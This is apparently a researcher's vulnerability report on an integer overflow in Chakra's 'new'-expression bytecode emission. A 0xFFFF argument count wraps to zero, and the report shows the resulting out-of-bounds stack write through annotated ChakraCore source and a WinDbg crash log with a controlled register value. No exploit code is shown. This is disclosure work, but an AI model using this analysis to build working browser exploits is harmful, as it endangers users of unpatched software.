<!-- Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team There is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP.

//ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
//
// Emits the byte code for a `new` expression: reserves the out-param space for the call,
// emits the call target and its arguments, then the NewScObject* / NewScObjArray*
// call instruction, and releases the out-param space again.
//
// Report (the second half of the bug is in SetOut below): argCount is a Js::ArgSlot.
// With 0xFFFF arguments the "include this" increment wraps it to 0, so the out-param
// space is recorded for 0 arguments while EmitArgList still emits every one of them.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount; //pnode->sxCall.argCount=0xFFFF
    argCount++; // include "this"  //overflow!!!! argCount==0
    BOOL fSideEffectArgs = FALSE;
    // tmpCount is the wider (unsigned int) count; the Assert below treats it as already
    // including "this". Assert is presumably compiled out of release builds, so it is not
    // what stops a wrapped argCount here.
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);
    // NOTE(review): this range check can never fire -- argCount is already a Js::ArgSlot,
    // so the cast is an identity and the wrap has already happened on the increment above.
    // A check that can fire has to look at the wider count before it is truncated, e.g.
    //     if (tmpCount != (Js::ArgSlot)tmpCount) { Js::Throw::OutOfMemory(); }
    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }
    byteCodeGenerator->StartStatement(pnode);
    // Start call, allocate out param space
    // With a wrapped argCount this reserves space for 0 out params (presumably why the
    // SetOut comment below says m_outParams holds a single element), while the
    // argument stores emitted below still target all 0xFFFF slots.
    funcInfo->StartRecordingOutArgs(argCount);
    // Assign the call target operand(s), putting them into expression temps if necessary to protect
    // them from side-effects.
    if (fSideEffectArgs)
    {
        SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
    }
    if (pnode->sxCall.pnodeTarget->nop == knopSuper)
    {
        EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);
    }
    Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);
    if (pnode->sxCall.pnodeArgs == nullptr)
    {
        // No explicit arguments: only "this" is passed.
        funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
        Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)) ?
            Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;
        Assert(argCount == 1);
        Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
        byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, argCount, callSiteId);
    }
    else
    {
        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
        uint32 actualArgCount = 0;
        if (IsCallOfConstants(pnode))
        {
            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
            actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);
        }
        else
        {
            Js::OpCode op;
            if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))
            {
                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;
            }
            else
            {
                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;
            }
            Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
            Js::AuxArray<uint32> *spreadIndices = nullptr;
            // Emits one store per argument into the out-param area; this is the producer of
            // the SetOut writes the report shows overrunning the frame.
            actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister, false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices);
            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
            if (pnode->sxCall.spreadArgCount > 0)
            {
                Assert(spreadIndices != nullptr);
                uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);
                uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;
                // NOTE(review): the (uint16) cast truncates the uint32 actualArgCount to the
                // instruction's argument width; same width boundary as the wrap above.
                byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, (uint16)actualArgCount, Js::CallIExtended_SpreadArgs, spreadIndices, spreadIndicesSize, callSiteId);
            }
            else
            {
                byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, (uint16)actualArgCount, callSiteId);
            }
        }
        Assert(argCount == actualArgCount);
    }
    // End call, pop param space
    funcInfo->EndRecordingOutArgs(argCount);
    return;
}

//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
//
// Stores an outgoing call argument into the frame's out-param area at outRegisterID.
// The Assert is the only bounds check here, and nothing ties outRegisterID back to the
// space StartRecordingOutArgs reserved for the call. The report's faulting instruction
// (`mov qword ptr [rcx+rdx*8],rax`, with rcx inside the thread's stack region and the
// target in a reserved, uncommitted page) is consistent with this indexed store.
inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)
{
    Assert(m_outParams + outRegisterID < m_outSp);
    m_outParams[outRegisterID] = aValue; //OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only
}

//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
//
// Interpreter entry point for one call of `function`: builds an InterpreterStackFrame
// for it (on the recycler heap for generators, in the interpreter arena when the locals
// area exceeds LocalsThreshold, otherwise via _alloca on the native stack), runs the
// byte code through Process()/DebugProcess(), and returns the result.
//   function               - the script function to run
//   args                   - the call's arguments (for generators: the generator object
//                            and a ResumeYieldData pointer)
//   returnAddress,
//   addressOfReturnAddress - handed to PushPopFrameHelper when DYNAMIC_INTERPRETER_THUNK is set
//   isAsmJs                - asm.js entry: skips the debug-mode paths and returns the frame itself
// Returns the function's return value, or the new InterpreterStackFrame for asm.js.
//
// The report's stack trace reaches the OOB store through this function
// (InterpreterHelper+0x4ac -> Process -> ProcessUnprofiled -> ProcessUnprofiledLargeLayoutPrefix).
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
    // Support for simulating partially initialized interpreter stack frame.
    InterpreterThunkStackCountTracker tracker;
    if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) && CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())
    {
        switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))
        {
        case 0:
            DebugBreak();
            break;
        case 1:
            Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);
            break;
        default:
            DebugBreak();
        }
    }
#endif
    ScriptContext* functionScriptContext = function->GetScriptContext();
    ThreadContext * threadContext = functionScriptContext->GetThreadContext();
    Assert(!threadContext->IsDisableImplicitException());
    functionScriptContext->VerifyAlive(!function->IsExternal());
    Assert(threadContext->IsScriptActive());
    Assert(threadContext->IsInScript());
    FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
    if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch
    {
        if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())
        {
            Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode
        }
        else
        {
            Throw::FatalInternalError();
        }
    }
#endif
    if (executeFunction->GetInterpretedCount() == 0)
    {
        executeFunction->TraceInterpreterExecutionMode();
    }
    // Restores the thread's loop depth on every exit path of this function; when entered
    // at a non-zero loop depth it also flags the (non-asm.js) function body as called from a loop.
    class AutoRestore
    {
    private:
        ThreadContext *const threadContext;
        const uint8 savedLoopDepth;
    public:
        AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction)
            : threadContext(threadContext), savedLoopDepth(threadContext->LoopDepth())
        {
            if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction())
            {
                executeFunction->SetWasCalledFromLoop();
            }
        }
        ~AutoRestore()
        {
            threadContext->SetLoopDepth(savedLoopDepth);
        }
    } autoRestore(threadContext, executeFunction);
#if ENABLE_PROFILE_INFO
    DynamicProfileInfo * dynamicProfileInfo = nullptr;
    const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter || (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction));
    if (doProfile)
    {
#if !DYNAMIC_INTERPRETER_THUNK
        executeFunction->EnsureDynamicProfileInfo();
#endif
        dynamicProfileInfo = executeFunction->GetDynamicProfileInfo();
        threadContext->ClearImplicitCallFlags();
    }
#else
    const bool doProfile = false;
#endif
    executeFunction->IncreaseInterpretedCount();
#ifdef BGJIT_STATS
    functionScriptContext->interpretedCount++;
    functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount());
#endif
    AssertMsg(!executeFunction->IsDeferredParseFunction(), "Non-intrinsic functions must provide byte-code to execute");
    executeFunction->BeginExecution();
    // fReleaseAlloc records that the interpreter arena was ensured for this call and must be released on exit.
    bool fReleaseAlloc = false;
    InterpreterStackFrame* newInstance = nullptr;
    Var* allocation = nullptr;
    if (!isAsmJs && executeFunction->IsCoroutine())
    {
        // If the FunctionBody is a generator then this call is being made by one of the three
        // generator resuming methods: next(), throw(), or return(). They all pass the generator
        // object as the first of two arguments. The real user arguments are obtained from the
        // generator object. The second argument is the ResumeYieldData which is only needed
        // when resuming a generator and so it is only used here if a frame already exists on the
        // generator object.
        AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer");
        JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]);
        newInstance = generator->GetFrame();
        if (newInstance != nullptr)
        {
            // Resuming an existing generator frame: only the yield register is updated.
            ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]);
            newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData);
            // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so
            // give the InterpreterStackFrame a legit enough stack address to make this comparison work.
            newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator);
        }
        else
        {
            //
            // Allocate a new InterpreterStackFrame instance on the recycler heap.
            // It will live with the JavascriptGenerator object.
            //
            Arguments generatorArgs = generator->GetArguments();
            InterpreterStackFrame::Setup setup(function, generatorArgs);
            size_t varAllocCount = setup.GetAllocationVarCount();
            size_t varSizeInBytes = varAllocCount * sizeof(Var);
            DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality
            Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ?
                executeFunction->GetLoopHeaderArrayPtr() : nullptr;
            allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var);
            AnalysisAssert(allocation);
#if DBG
            // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame
            Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var);
            AnalysisAssert(invalidVar);
            memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject));
            newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar);
#else
            newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr);
#endif
            newInstance->m_reader.Create(executeFunction);
            generator->SetFrame(newInstance, varSizeInBytes);
        }
    }
    else
    {
        InterpreterStackFrame::Setup setup(function, args);
        size_t varAllocCount = setup.GetAllocationVarCount();
        size_t varSizeInBytes = varAllocCount * sizeof(Var);
        //
        // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
        //
        DWORD_PTR stackAddr;
        // If the locals area exceeds a certain limit, allocate it from a private arena rather than
        // this frame. The current limit is based on an old assert on the number of locals we would allow here.
        if (varAllocCount > InterpreterStackFrame::LocalsThreshold)
        {
            ArenaAllocator *tmpAlloc = nullptr;
            fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
            allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
            stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
        }
        else
        {
            // Frame (including its out-param area) lives on the native stack. The report's
            // `!address` output places the faulting store's base in the thread's stack region
            // and its target in a reserved page beyond it, consistent with a frame from this
            // path being overrun -- the size reserved here is derived from the byte code's
            // counts, which EmitNew above can under-report after the wrap.
            PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
            allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
            memset(allocation, 0xFE, varSizeInBytes);
#endif
            stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
        }
        /*
         * If the function has any loop headers, we allocate an array for the loop headers wrappers, and
         * reference the wrappers in the array. We then push the pointer to the array onto the stack itself.
         * We do this so that while the function is being interpreted, we don't want the jitted loop
         * bodies to be collected, even if the loop body isn't being executed. The loop body will
         * get collected when the function has been JITted, and when the function exits the interpreter.
         * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but
         * it's cheaper to just copy them all into the recycler array rather than just the ones that
         * have been jitted.
         */
        Var loopHeaderArray = nullptr;
        if (executeFunction->GetHasAllocatedLoopHeaders())
        {
            // Loop header array is recycler allocated, so we push it on the stack
            // When we scan the stack, we'll recognize it as a recycler allocated
            // object, and mark its contents and keep the individual loop header
            // wrappers alive
            loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr();
        }
#if DBG
        Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject));
        memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject));
        newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar);
#else
        newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr);
#endif
        newInstance->m_reader.Create(executeFunction);
    }
    //
    // Execute the function's byte-code, returning the return-value:
    // - Mark that the function is current executing and may not be modified.
    //
#if ENABLE_TTD
    // Time-travel debugging bookkeeping: push a call event now, popped after execution below.
    TTD::TTDExceptionFramePopper exceptionFramePopper;
    if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
    {
        bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock);
        threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally);
        exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function);
    }
#endif
    Var aReturn = nullptr;
    {
        if (!isAsmJs && executeFunction->IsInDebugMode())
        {
#if DYNAMIC_INTERPRETER_THUNK
            PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
            aReturn = newInstance->DebugProcess();
#else
            aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
#endif
        }
        else
        {
#if DYNAMIC_INTERPRETER_THUNK
            PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
            aReturn = newInstance->Process();
#else
            aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
#endif
        }
    }
    executeFunction->EndExecution();
#if ENABLE_TTD
    if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
    {
        exceptionFramePopper.PopInfo();
        threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn);
    }
#endif
    if (fReleaseAlloc)
    {
        functionScriptContext->ReleaseInterpreterArena();
    }
#if ENABLE_PROFILE_INFO
    if (doProfile)
    {
        dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags());
    }
#endif
    if (isAsmJs)
    {
        return newInstance;
    }
    return aReturn;
}

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. 
*** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\Windows\System32\combase.dll ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffe`98900000 00007ffe`98960000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\Windows\System32\sechost.dll ModLoad: 00007ffe`96080000 00007ffe`96306000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\Windows\System32\shcore.dll ModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 
C:\Windows\System32\gdi32full.dll ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\Windows\System32\USER32.dll ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\Windows\System32\win32u.dll ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\Windows\System32\profapi.dll ModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\Windows\System32\NSI.dll ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\Windows\System32\ole32.dll ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 
00007ffe`80f50000 00007ffe`8173a000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffe`98590000 00007ffe`98696000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffe`98500000 00007ffe`98582000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\Windows\System32\shell32.dll ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\Windows\System32\msctf.dll ModLoad: 00007ffe`98700000 00007ffe`98802000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\Windows\SYSTEM32\urlmon.dll 
ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\Windows\System32\rmclient.dll ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffe`99510000 00007ffe`99552000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\Windows\system32\msimtf.dll ModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ffe`98170000 00007ffe`98184000 
C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffe`81bb0000 00007ffe`81be8000 C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffe`94210000 00007ffe`94398000 C:\Windows\SYSTEM32\windows.globalization.dll ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\Windows\System32\uiautomationcore.dll (1590.5d8): Break instruction exception - code 80000003 (first chance) ntdll!DbgBreakPoint: 00007ffe`a1f48d70 cc int 3 0:035> g onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 系统找不到指定的文件。 (1590.b70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 0:016> r rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98 rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025 rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00 r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760 r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270 r14=0000000000000000 r15=000002aa98205cc2 iopl=0 nv up ei pl nz ac pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 
